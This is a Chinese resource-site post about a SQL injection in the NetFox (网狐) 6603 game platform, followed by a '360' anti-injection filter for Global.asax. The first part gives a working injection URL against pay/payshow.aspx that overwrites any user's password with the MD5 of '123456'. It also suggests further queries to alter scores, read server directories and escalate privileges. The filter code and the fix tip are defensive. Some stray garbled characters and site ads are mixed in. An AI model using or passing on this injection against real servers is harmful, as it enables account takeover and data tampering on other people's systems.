网狐6603 SQL注入任意修改数据

自助开通VIP,整站资源任意下载

先看下网站是否存在pay/payshow.aspx页面。

构造

url=http://192.168.1.8/pay/payshow.aspx?orderid=1';UPDATE%20QPAccountsDB.dbo.Accounts

Info%20SET%20LogonPass%20=%20'E10ADC3949BA59ABBE56E057F20F883E'%20WHER

E%20accounts%20=用户名%20--

E10ADC3949BA59ABBE56E057F20F883E=MD5(123456)

直接访问URL,看看密码是不是变成123456了。

自己构造别的语句,可以修改任意分数,读取服务器目录,提权...........

其他页面也有这样的BUG。

以下是360通用sql防注入方法。

-----------------使用方法------------------------------------------------------------------

1.将App_Code目录拷贝到web根目录

假如已经存在App_Code目录,那直接把App_Code目录里的360safe.cs文件拷贝到当前

App_Code目录即可。

2.将Global.asax文件拷贝到web根目录

假如已经存在Global.asax文件,那直接把下面这段代码

voidApplication_BeginRequest(objectsender,EventArgse)

{

if(Request.Cookies!=null)

{

if(safe_360.CookieData())

{

Response.Write("您提交的Cookie数据有恶意字符!");

Response.End();

}

}

if(Request.UrlReferrer!=null)

{

if(safe_360.referer()){

Response.Write("您提交的Referrer数据有恶意字符!");

网狐6603 SQL注入任意修改数据,网狐6603 SQL注入任意修改数据,网狐6603,网站,网狐,第1张

Response.End();

}

}

if(Request.RequestType.ToUpper()=="POST")

 

- `3 ?! L6 J4 t& n% Z+ U

{

if(safe_360.PostData())

{

Response.Write("您提交的Post数据有恶意字符!");

Response.End();

}

网狐6603 SQL注入任意修改数据,网狐6603 SQL注入任意修改数据,网狐6603,网站,网狐,第2张

}

if(Request.RequestType.ToUpper()=="GET")

{

if(safe_360.GetData())

{

Response.Write("您提交的Get数据有恶意字符!");

Response.End();

}

}

}

拷贝到当前的Global.asax文件里保存。

 

 

修复方法:安装个安全狗就OK了

① 本网站名称及网址:八爷资源网 | www.8ye.vip
② 本网站资源来源于网络收集,如有侵权,请联系站长进行删除处理。
③ 分享目的仅供大家学习和交流,请不要用于商业用途,否则后果自负。
④ 如果你也有好源码或者教程,可以联系小编,有钻石奖励和额外收入。
⑤ 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解。
⑥ 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需。
⑦ 本站资源大多存储在云盘,如发现链接失效,请联系客服,我们会第一时间更新。
八爷资源网 » 网狐6603 SQL注入任意修改数据

VIP会员尊享专属特权,真正的海量,无套路,无限量下载!

游戏演示 联系客服